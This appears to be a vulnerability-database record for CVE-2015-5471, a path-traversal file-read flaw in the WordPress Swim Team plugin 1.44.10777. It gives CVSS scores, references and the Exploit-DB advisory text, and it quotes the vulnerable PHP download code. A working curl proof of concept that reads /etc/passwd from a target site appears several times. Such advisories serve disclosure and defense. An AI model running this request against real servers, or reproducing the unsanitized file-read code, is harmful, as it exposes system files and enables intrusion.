ID WPEX-ID:8071
Type wpexploit
Reporter Larry W. Cashdollar
Modified 2019-10-22T00:00:00
Description
WordPress Vulnerability - Swim Team <= v1.44.10777 - Local File Inclusion
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
{"id": "WPEX-ID:8071", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Swim Team <= v1.44.10777 - Local File Inclusion", "description": "WordPress Vulnerability - Swim Team <= v1.44.10777 - Local File Inclusion\n", "published": "2015-07-03T00:00:00", "modified": "2019-10-22T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Larry W. Cashdollar", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5471", "https://packetstormsecurity.com/files/132653/", "https://vapid.dhs.org/advisory.php?v=134", "https://wordpress.org/support/topic/security-vulnerability-6?replies=3#post-7141123"], "cvelist": ["CVE-2015-5471"], "lastseen": "2020-06-29T19:29:33", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5471"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8071"]}, {"type": "exploitdb", "idList": ["EDB-ID:37601"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132653"]}], "modified": "2020-06-29T19:29:33", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-06-29T19:29:33", "rev": 2}, "vulnersScore": 6.0}, "sourceData": "$ curl \"http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress\""}
{"cve": [{"lastseen": "2020-10-03T12:49:53", "description": "Absolute path traversal vulnerability in include/user/download.php in the Swim Team plugin 1.44.10777 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-01-12T19:59:00", "title": "CVE-2015-5471", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5471"], "modified": "2016-11-28T19:33:00", "cpe": ["cpe:/a:swim_team_project:swim_team:1.44.10777"], "id": "CVE-2015-5471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5471", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T06:11:07", "description": "WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download. CVE-2015-5471. Webapps exploit for php platform", "published": "2015-07-13T00:00:00", "type": "exploitdb", "title": "WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5471"], "modified": "2015-07-13T00:00:00", "id": "EDB-ID:37601", "href": "https://www.exploit-db.com/exploits/37601/", "sourceData": "Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777\r\nAuthor: Larry W. Cashdollar, @_larry0\r\nDate: 2015-07-02\r\nDownload Site: https://wordpress.org/plugins/wp-swimteam\r\nVendor: Mike Walsh www.MichaelWalsh.org\r\nVendor Notified: 2015-07-02, fixed in v1.45beta3\r\nVendor Contact: Through website\r\nAdvisory: http://www.vapid.dhs.org/advisory.php?v=134\r\nDescription: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.\r\nVulnerability:\r\nThe code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:\r\n\r\n\r\n 50 $file = urldecode($args['file']) ;\r\n 51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;\r\n 52 \r\n 53 while (!feof($fh))\r\n 54 $txt .= fread($fh, 1024) ;\r\n 55 \r\n 56 // Clean up the temporary file - permissions\r\n 57 // may prevent this from succeedeing so use the '@'\r\n 58 // to suppress any messages from PHP.\r\n 59 \r\n 60 @unlink($file) ;\r\n 61 }\r\n 62 \r\n 63 $filename = urldecode($args['filename']) ;\r\n 64 $contenttype = urldecode($args['contenttype']) ;\r\n 65 \r\n 66 // Tell browser to expect a text file of some sort (usually txt or csv)\r\n 67 \r\n 68 header(sprintf('Content-Type: application/%s', $contenttype)) ;\r\n 69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;\r\n 70 print $txt ;\r\n\r\nCVEID:\r\nOSVDB:\r\nExploit Code:\r\n\r\n \u00e2\u0080\u02d8 $ curl \"http://server/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress\"", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37601/"}], "wpvulndb": [{"lastseen": "2020-06-29T19:29:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-5471"], "description": "WordPress Vulnerability - Swim Team <= v1.44.10777 - Local File Inclusion \n\n### PoC\n\n$ curl \"http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename;=/etc/passwd&contenttype;=text/html&transient;=1&abspath;=/usr/share/wordpress\"\n", "modified": "2019-10-22T00:00:00", "published": "2015-07-03T00:00:00", "id": "WPVDB-ID:8071", "href": "https://wpvulndb.com/vulnerabilities/8071", "type": "wpvulndb", "title": "Swim Team <= v1.44.10777 - Local File Inclusion", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
